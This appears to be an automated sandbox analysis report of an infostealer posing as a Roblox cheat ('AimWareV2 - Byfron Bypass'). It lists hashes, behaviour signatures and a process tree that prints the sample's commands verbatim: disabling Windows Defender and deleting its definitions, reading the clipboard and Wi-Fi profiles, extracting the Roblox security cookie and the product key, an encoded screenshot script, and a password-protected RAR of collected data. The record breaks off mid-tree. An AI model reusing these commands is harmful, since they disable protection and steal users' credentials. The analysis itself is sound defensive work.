Analysis

  • max time kernel
    316s
  • max time network
    1596s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    03-07-2024 10:27

General

  • Target

    AimWareV2 - Byfron Bypass.exe

  • Size

    6.0MB

  • MD5

    1695e5af7dce669783d2c8172831df4b

  • SHA1

    7e85197b042369a9a7896b4b118ac825e5b87970

  • SHA256

    4921b5dca4c985c2b55308d480c5aae667b9f995fb4b75a6a3539e22f8106c6d

  • SHA512

    af03f88a3377e82931a4c76fe65cefae383dab984e7799830d86cf57ecae4be84f141e7abb7cb31a85a4ae635c8bd4288705c6d0d243782709c8e02b44568076

  • SSDEEP

    98304:VRFEtdFBCzamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4RgOuAKRFpHyG:V6FI2eN/FJMIDJf0gsAGK4RruAKRXSG

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 35 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\AimWareV2 - Byfron Bypass.exe
    "C:\Users\Admin\AppData\Local\Temp\AimWareV2 - Byfron Bypass.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4740
    • C:\Users\Admin\AppData\Local\Temp\AimWareV2 - Byfron Bypass.exe
      "C:\Users\Admin\AppData\Local\Temp\AimWareV2 - Byfron Bypass.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1340
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\AimWareV2 - Byfron Bypass.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1752
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\AimWareV2 - Byfron Bypass.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4120
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4556
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1168
        • C:\Program Files\Windows Defender\MpCmdRun.exe
          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
          4⤵
          • Deletes Windows Defender Definitions
          PID:4040
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('BYFRON BYPASS WAS SUCCESSFULLY! DO NOT CLOSE THIS TAB!!! READ #HOW-TO-USE CHANNEL BEFORE USING AIMWAREV2! DM US IF YOU HAVE ANY PROBLEM discord.gg/j8TxTS3tZq', 0, 'AimWareV2 - BYFRON BYPASS - SUCCESSFULLY', 48+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:224
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('BYFRON BYPASS WAS SUCCESSFULLY! DO NOT CLOSE THIS TAB!!! READ #HOW-TO-USE CHANNEL BEFORE USING AIMWAREV2! DM US IF YOU HAVE ANY PROBLEM discord.gg/j8TxTS3tZq', 0, 'AimWareV2 - BYFRON BYPASS - SUCCESSFULLY', 48+16);close()"
          4⤵
            PID:3464
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ ​ .scr'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4360
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ ​ .scr'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1052
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:368
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3648
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2632
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4216
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5008
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2924
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:64
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:652
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4204
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:2392
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3196
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:4464
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3160
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:4996
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2736
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              4⤵
                PID:4952
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2624
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2912
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\230thdcp\230thdcp.cmdline"
                  5⤵
                    PID:1136
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6CE3.tmp" "c:\Users\Admin\AppData\Local\Temp\230thdcp\CSCC92BFBE446C8483E9A32B52C5E242120.TMP"
                      6⤵
                        PID:364
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3488
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:2752
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4396
                    • C:\Windows\system32\attrib.exe
                      attrib -r C:\Windows\System32\drivers\etc\hosts
                      4⤵
                      • Drops file in Drivers directory
                      • Views/modifies file attributes
                      PID:2960
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:3188
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:3644
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                        3⤵
                          PID:1876
                          • C:\Windows\system32\attrib.exe
                            attrib +r C:\Windows\System32\drivers\etc\hosts
                            4⤵
                            • Drops file in Drivers directory
                            • Views/modifies file attributes
                            PID:4880
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:4048
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:4220
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                              3⤵
                                PID:1324
                                • C:\Windows\system32\tasklist.exe
                                  tasklist /FO LIST
                                  4⤵
                                  • Enumerates processes with tasklist
                                  PID:4244
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:2844
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:3196
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:2960
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:2772
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                        3⤵
                                          PID:4852
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            4⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:1424
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                          3⤵
                                            PID:1220
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                              4⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:3364
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "getmac"
                                            3⤵
                                              PID:1484
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                4⤵
                                                  PID:4040
                                                • C:\Windows\system32\getmac.exe
                                                  getmac
                                                  4⤵
                                                    PID:396
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI47402\rar.exe a -r -hp"blank1223" "C:\Users\Admin\AppData\Local\Temp\lQ6mu.zip" *"
                                                  3⤵
                                                    PID:4936
                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI47402\rar.exe
                                                      C:\Users\Admin\AppData\Local\Temp\_MEI47402\rar.exe a -r -hp"blank1223" "C:\Users\Admin\AppData\Local\Temp\lQ6mu.zip" *
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:5076
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                    3⤵
                                                      PID:604
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic os get Caption
                                                        4⤵
                                                          PID:404
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                        3⤵
                                                          PID:3492
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic computersystem get totalphysicalmemory
                                                            4⤵
                                                              PID:3808
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                            3⤵
                                                              PID:2912
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic csproduct get uuid
                                                                4⤵
                                                                  PID:2940
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                3⤵
                                                                  PID:4592
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                    4⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:368
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                  3⤵
                                                                    PID:2752
                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                      wmic path win32_VideoController get name
                                                                      4⤵
                                                                      • Detects videocard installed
                                                                      PID:4668
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                    3⤵
                                                                      PID:4080
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
